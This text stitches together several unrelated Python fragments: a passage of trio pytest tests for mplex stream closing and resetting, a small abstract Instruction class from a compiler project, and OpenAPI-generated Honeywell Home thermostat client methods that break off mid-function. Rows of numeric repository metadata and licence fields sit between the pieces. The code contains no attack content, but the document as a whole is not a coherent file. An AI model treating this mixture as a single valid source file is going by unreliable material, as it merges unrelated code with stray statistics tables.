async def read_until_eof():
read_bytes.extend(await stream_1.read())
expected_data = bytearray()
async with trio.open_nursery() as nursery:
nursery.start_soon(read_until_eof)
# Test: `read` doesn't return before `close` is called.
await stream_0.write(DATA)
expected_data.extend(DATA)
await trio.sleep(0.01)
assert len(read_bytes) == 0
# Test: `read` doesn't return before `close` is called.
await stream_0.write(DATA)
expected_data.extend(DATA)
await trio.sleep(0.01)
assert len(read_bytes) == 0
# Test: Close the stream, `read` returns, and receive previous sent data.
await stream_0.close()
assert read_bytes == expected_data
@pytest.mark.trio
async def test_mplex_stream_read_after_remote_closed(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
assert not stream_1.event_remote_closed.is_set()
await stream_0.write(DATA)
assert not stream_0.event_local_closed.is_set()
await trio.sleep(0.01)
await wait_all_tasks_blocked()
await stream_0.close()
assert stream_0.event_local_closed.is_set()
await trio.sleep(0.01)
await wait_all_tasks_blocked()
assert stream_1.event_remote_closed.is_set()
assert (await stream_1.read(MAX_READ_LEN)) == DATA
with pytest.raises(MplexStreamEOF):
await stream_1.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_read_after_local_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.reset()
with pytest.raises(MplexStreamReset):
await stream_0.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_read_after_remote_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
await stream_0.reset()
# Sleep to let `stream_1` receive the message.
await trio.sleep(0.1)
await wait_all_tasks_blocked()
with pytest.raises(MplexStreamReset):
await stream_1.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_read_after_remote_closed_and_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
await stream_0.close()
await stream_0.reset()
# Sleep to let `stream_1` receive the message.
await trio.sleep(0.01)
assert (await stream_1.read(MAX_READ_LEN)) == DATA
@pytest.mark.trio
async def test_mplex_stream_write_after_local_closed(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
await stream_0.close()
with pytest.raises(MplexStreamClosed):
await stream_0.write(DATA)
@pytest.mark.trio
async def test_mplex_stream_write_after_local_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.reset()
with pytest.raises(MplexStreamClosed):
await stream_0.write(DATA)
@pytest.mark.trio
async def test_mplex_stream_write_after_remote_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_1.reset()
await trio.sleep(0.01)
with pytest.raises(MplexStreamClosed):
await stream_0.write(DATA)
@pytest.mark.trio
async def test_mplex_stream_both_close(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
# Flags are not set initially.
assert not stream_0.event_local_closed.is_set()
assert not stream_1.event_local_closed.is_set()
assert not stream_0.event_remote_closed.is_set()
assert not stream_1.event_remote_closed.is_set()
# Streams are present in their `mplex_conn`.
assert stream_0 in stream_0.muxed_conn.streams.values()
assert stream_1 in stream_1.muxed_conn.streams.values()
# Test: Close one side.
await stream_0.close()
await trio.sleep(0.01)
assert stream_0.event_local_closed.is_set()
assert not stream_1.event_local_closed.is_set()
assert not stream_0.event_remote_closed.is_set()
assert stream_1.event_remote_closed.is_set()
# Streams are still present in their `mplex_conn`.
assert stream_0 in stream_0.muxed_conn.streams.values()
assert stream_1 in stream_1.muxed_conn.streams.values()
# Test: Close the other side.
await stream_1.close()
await trio.sleep(0.01)
# Both sides are closed.
assert stream_0.event_local_closed.is_set()
assert stream_1.event_local_closed.is_set()
assert stream_0.event_remote_closed.is_set()
assert stream_1.event_remote_closed.is_set()
# Streams are removed from their `mplex_conn`.
assert stream_0 not in stream_0.muxed_conn.streams.values()
assert stream_1 not in stream_1.muxed_conn.streams.values()
# Test: Reset after both close.
await stream_0.reset()
@pytest.mark.trio
async def test_mplex_stream_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.reset()
await trio.sleep(0.01)
# Both sides are closed.
assert stream_0.event_local_closed.is_set()
assert stream_1.event_local_closed.is_set()
assert stream_0.event_remote_closed.is_set()
assert stream_1.event_remote_closed.is_set()
# Streams are removed from their `mplex_conn`.
assert stream_0 not in stream_0.muxed_conn.streams.values()
assert stream_1 not in stream_1.muxed_conn.streams.values()
# `close` should do nothing.
await stream_0.close()
await stream_1.close()
# `reset` should do nothing as well.
await stream_0.reset()
await stream_1.reset()
| 34.104762
| 85
| 0.745043
| 1,094
| 7,162
| 4.542048
| 0.107861
| 0.078889
| 0.062789
| 0.044476
| 0.820286
| 0.784665
| 0.759106
| 0.728718
| 0.712216
| 0.66774
| 0
| 0.0235
| 0.174113
| 7,162
| 209
| 86
| 34.267943
| 0.816568
| 0.13823
| 0
| 0.75
| 0
| 0
| 0.001301
| 0
| 0
| 0
| 0
| 0
| 0.243243
| 1
| 0
| false
| 0
| 0.040541
| 0
| 0.040541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bf683b10b0c45d1a88e60f164677116b1eb3bf8
| 237
|
py
|
Python
|
compilacion/analisis_semantico/Ast/instruction.py
|
Gusta2307/Football-Simulation-IA-SIM-COM-
|
8c29c5b1ef61708a4f8b34f5e0e00990aeecfacd
|
[
"MIT"
] | null | null | null |
compilacion/analisis_semantico/Ast/instruction.py
|
Gusta2307/Football-Simulation-IA-SIM-COM-
|
8c29c5b1ef61708a4f8b34f5e0e00990aeecfacd
|
[
"MIT"
] | null | null | null |
compilacion/analisis_semantico/Ast/instruction.py
|
Gusta2307/Football-Simulation-IA-SIM-COM-
|
8c29c5b1ef61708a4f8b34f5e0e00990aeecfacd
|
[
"MIT"
] | 1
|
2022-02-07T04:47:15.000Z
|
2022-02-07T04:47:15.000Z
|
import abc
from compilacion.analisis_semantico.scope import Scope
from compilacion.analisis_semantico.Ast.AstNode import AstNode
class Instruction(AstNode):
@abc.abstractclassmethod
def execute(self, scope: Scope):
pass
| 26.333333
| 62
| 0.78903
| 28
| 237
| 6.607143
| 0.571429
| 0.162162
| 0.248649
| 0.345946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147679
| 237
| 9
| 63
| 26.333333
| 0.915842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0.142857
| 0.428571
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
cbf1edf4ef82c6ea32c9a06aa846dc910ab6074a
| 49,650
|
py
|
Python
|
honeywell_home/api/default_api.py
|
dbarentine/udi-honeywellhome-poly
|
e89a3ff0e9a379d399813d42bf85e7c1215f6bc3
|
[
"MIT"
] | 1
|
2019-12-19T18:57:17.000Z
|
2019-12-19T18:57:17.000Z
|
honeywell_home/api/default_api.py
|
dbarentine/udi-honeywellhome-poly
|
e89a3ff0e9a379d399813d42bf85e7c1215f6bc3
|
[
"MIT"
] | 9
|
2020-03-01T19:51:06.000Z
|
2021-09-27T21:16:36.000Z
|
honeywell_home/api/default_api.py
|
dbarentine/udi-honeywellhome-poly
|
e89a3ff0e9a379d399813d42bf85e7c1215f6bc3
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Honeywell Home
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from honeywell_home.api_client import ApiClient
from honeywell_home.exceptions import (
ApiTypeError,
ApiValueError
)
class DefaultApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v2_devices_thermostats_device_id_fan_post(self, apikey, user_ref_id, location_id, device_id, update_fan_mode, **kwargs): # noqa: E501
"""Change the current Fan setting for specified DeviceID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_fan_post(apikey, user_ref_id, location_id, device_id, update_fan_mode, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateFanMode update_fan_mode: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_fan_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_fan_mode, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_fan_post_with_http_info(self, apikey, user_ref_id, location_id, device_id, update_fan_mode, **kwargs): # noqa: E501
"""Change the current Fan setting for specified DeviceID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_fan_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_fan_mode, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateFanMode update_fan_mode: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'update_fan_mode'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_fan_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'update_fan_mode' is set
if ('update_fan_mode' not in local_var_params or
local_var_params['update_fan_mode'] is None):
raise ApiValueError("Missing the required parameter `update_fan_mode` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'update_fan_mode' in local_var_params:
body_params = local_var_params['update_fan_mode']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}/fan', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_get(self, apikey, user_ref_id, location_id, device_id, **kwargs): # noqa: E501
"""Return status of a thermostat # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_get(apikey, user_ref_id, location_id, device_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Thermostat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_get_with_http_info(apikey, user_ref_id, location_id, device_id, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_get_with_http_info(self, apikey, user_ref_id, location_id, device_id, **kwargs): # noqa: E501
"""Return status of a thermostat # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_get_with_http_info(apikey, user_ref_id, location_id, device_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Thermostat, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Thermostat', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_group_group_id_rooms_get(self, apikey, user_ref_id, location_id, device_id, group_id, **kwargs): # noqa: E501
"""Return status of sensors # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_group_group_id_rooms_get(apikey, user_ref_id, location_id, device_id, group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param int group_id: Group ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ThermostatSensor
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_group_group_id_rooms_get_with_http_info(apikey, user_ref_id, location_id, device_id, group_id, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_group_group_id_rooms_get_with_http_info(self, apikey, user_ref_id, location_id, device_id, group_id, **kwargs): # noqa: E501
"""Return status of sensors # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_group_group_id_rooms_get_with_http_info(apikey, user_ref_id, location_id, device_id, group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param int group_id: Group ID (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ThermostatSensor, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'group_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_group_group_id_rooms_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'group_id' is set
if ('group_id' not in local_var_params or
local_var_params['group_id'] is None):
raise ApiValueError("Missing the required parameter `group_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
if 'group_id' in local_var_params:
path_params['groupId'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}/group/{groupId}/rooms', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ThermostatSensor', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_post(self, apikey, user_ref_id, location_id, device_id, update_thermostat, **kwargs): # noqa: E501
"""Change the setpoint, system mode, and auto changeover status of a thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_post(apikey, user_ref_id, location_id, device_id, update_thermostat, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateThermostat update_thermostat: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_thermostat, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_post_with_http_info(self, apikey, user_ref_id, location_id, device_id, update_thermostat, **kwargs): # noqa: E501
"""Change the setpoint, system mode, and auto changeover status of a thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_thermostat, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateThermostat update_thermostat: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'update_thermostat'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'update_thermostat' is set
if ('update_thermostat' not in local_var_params or
local_var_params['update_thermostat'] is None):
raise ApiValueError("Missing the required parameter `update_thermostat` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'update_thermostat' in local_var_params:
body_params = local_var_params['update_thermostat']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_priority_put(self, apikey, user_ref_id, location_id, device_id, update_priority, **kwargs): # noqa: E501
"""Change the room priority settings for a T9/T10 thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_priority_put(apikey, user_ref_id, location_id, device_id, update_priority, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdatePriority update_priority: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_priority_put_with_http_info(apikey, user_ref_id, location_id, device_id, update_priority, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_priority_put_with_http_info(self, apikey, user_ref_id, location_id, device_id, update_priority, **kwargs): # noqa: E501
"""Change the room priority settings for a T9/T10 thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_priority_put_with_http_info(apikey, user_ref_id, location_id, device_id, update_priority, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdatePriority update_priority: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'update_priority'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_priority_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
